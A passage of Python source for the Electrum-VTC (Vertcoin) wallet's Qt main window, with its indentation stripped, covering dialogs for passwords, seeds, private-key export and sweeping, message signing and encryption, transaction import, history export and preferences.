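# would late-bind 'm' and every command would run the last method.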
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0] == '_' or m in ['network', 'wallet']:
continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(unicode(line2.text()), str(line1.text()))
def show_master_public_keys(self):
dialog = WindowModalDialog(self, "Master Public Keys")
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(100)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(i+1)
return ''
labels = [ label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk_list = self.wallet.get_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
vbox.addWidget( QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pk_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = ("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.")
@protected
def do_sign(self, address, message, signature, password):
address = str(address.text()).strip()
message = unicode(message.toPlainText()).encode('utf-8').strip()
if not bitcoin.is_address(address):
self.show_message('Invalid Vertcoin address.')
return
if not bitcoin.is_p2pkh(address):
self.show_message('Cannot sign messages with this type of address.' + '\n\n' + self.msg_sign)
return
if not self.wallet.is_mine(address):
self.show_message('Address not in wallet.')
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = str(address.text()).strip()
message = unicode(message.toPlainText()).encode('utf-8').strip()
if not bitcoin.is_address(address):
self.show_message('Invalid Vertcoin address.')
return
if not bitcoin.is_p2pkh(address):
self.show_message('Cannot verify messages with this type of address.' + '\n\n' + self.msg_sign)
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(410, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = str(encrypted_e.toPlainText())
task = partial(self.wallet.decrypt_message, str(pubkey_e.text()),
cyphertext, password)
self.wallet.thread.add(task, on_success=message_e.setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = unicode(message_e.toPlainText())
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, str(pubkey_e.text()))
encrypted_e.setText(encrypted)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address = ''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_vtc.transaction import tx_from_str, Transaction
try:
tx = tx_from_str(txt)
return Transaction(tx)
except:
traceback.print_exc(file=sys.stdout)
self.show_critical(_("Electrum was unable to parse your transaction"))
return
def read_tx_from_qrcode(self):
from electrum_vtc import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a vertcoin URI (scheme matching is case-insensitive)
if data.lower().startswith("vertcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
# transactions are binary, but qrcode seems to return utf8...
data = data.decode('utf8')
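# Offline-signed transactions are carried in QR codes as base43 (a
# compact alphabet suited to alphanumeric QR mode); decode to raw bytes,
# then hex-encode for the transaction parser.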
z = bitcoin.base_decode(data, length=None, base=43)
data = ''.join(chr(ord(b)) for b in z).encode('hex')
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_vtc import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-vtc-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
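# Derive the keys on a background thread so the dialog can show progress;
# the `done` flag lets the thread stop early if the user cancels, and the
# old-style Qt SIGNALs marshal UI updates back onto the GUI thread.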
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done:
break
private_keys[addr] = "\n".join(self.wallet.get_private_key(addr, password))
d.emit(SIGNAL('computing_privkeys'))
d.emit(SIGNAL('show_privkeys'))
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
d.connect(d, QtCore.SIGNAL('computing_privkeys'), lambda: e.setText("Please wait... %d/%d" % (len(private_keys), len(addresses))))
d.connect(d, QtCore.SIGNAL('show_privkeys'), show_privkeys)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
writer = csv.writer(f)
writer.writerow(["address", "private_key"])
for addr, pk in pklist.items():
writer.writerow(["%34s" % addr, pk])
else:
import json
f.write(json.dumps(pklist, indent=4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r') as f:
data = f.read()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum-vtc_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-vtc-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
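# Each history item is a (tx_hash, height, confirmations, timestamp, value,
# balance) tuple; height <= 0 means unconfirmed, and a confirmed entry with
# no timestamp is reported as unverified.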
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
label = label.encode('utf-8')
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid': tx_hash, 'date': "%16s" % time_string, 'label': label, 'value': value_string})
with open(fileName, "w+") as f:
if is_csv:
writer = csv.writer(f, lineterminator='\n')
writer.writerow(["transaction_hash", "label", "confirmations", "value", "timestamp"])
for line in lines:
writer.writerow(line)
else:
import json
f.write(json.dumps(lines, indent=4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = QTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
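# Enable the Sweep button only once both inputs validate: get_address()
# returns a well-formed address and get_pk() parses at least one key.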
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet(BLACK_FG if get_address() else RED_FG)
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
try:
tx = self.wallet.sweep(get_pk(), self.network, self.config, get_address(), None)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
self.show_transaction(tx)
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'))
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
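# Each tab below collects (label, widget) pairs; a pair whose second element
# is None (standalone checkboxes) spans both grid columns when the tabs are
# laid out at the end of this method.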
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_vtc.i18n import languages
lang_combo.addItems(languages.values())
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = languages.keys()[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
update_maxfee()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
def on_maxfee(x):
m = maxfee_e.get_amount()
if m: self.config.set_key('max_fee_rate', m)
self.fee_slider.update()
def update_maxfee():
d = self.config.is_dynfee()
maxfee_e.setDisabled(d)
maxfee_label.setDisabled(d)
maxfee_label = HelpLabel(_('Max static fee'), _('Max value of the static fee slider'))
maxfee_e = BTCkBEdit(self.get_decimal_point)
maxfee_e.setAmount(self.config.max_fee_rate())
maxfee_e.textChanged.connect(on_maxfee)
update_maxfee()
fee_widgets.append((maxfee_label, maxfee_e))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
rbf_policy = self.config.get('rbf_policy', 2)
rbf_label = HelpLabel(_('Propose Replace-By-Fee') + ':', '')
rbf_combo = QComboBox()
rbf_combo.addItems([_('Always'), _('If the fee is low'), _('Never')])
rbf_combo.setCurrentIndex(rbf_policy)
def on_rbf(x):
self.config.set_key('rbf_policy', x)
rbf_combo.currentIndexChanged.connect(on_rbf)
fee_widgets.append((rbf_label, rbf_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet(GREEN_BG if validated else RED_BG)
else:
alias_e.setStyleSheet(RED_BG)
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.connect(self, SIGNAL('alias_received'), set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet(RED_BG if SSL_error else GREEN_BG if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['VTC', 'mVTC', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1 VTC = 1000 mVTC.\n' \
+ _('This setting affects the fields in the Send tab.')
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'VTC':
self.decimal_point = 8
elif unit_result == 'mVTC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(on_unit)
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_vtc import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", str(qr_combo.itemData(x).toString()), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
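# The three fiat controls are interdependent: picking a currency refreshes
# the exchange list, and enabling history rates restricts the list to
# exchanges that provide historical data, so every handler re-runs the
# update_* helpers defined below.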
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
update_currencies()
update_history_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.disconnect(self, SIGNAL('alias_received'), set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
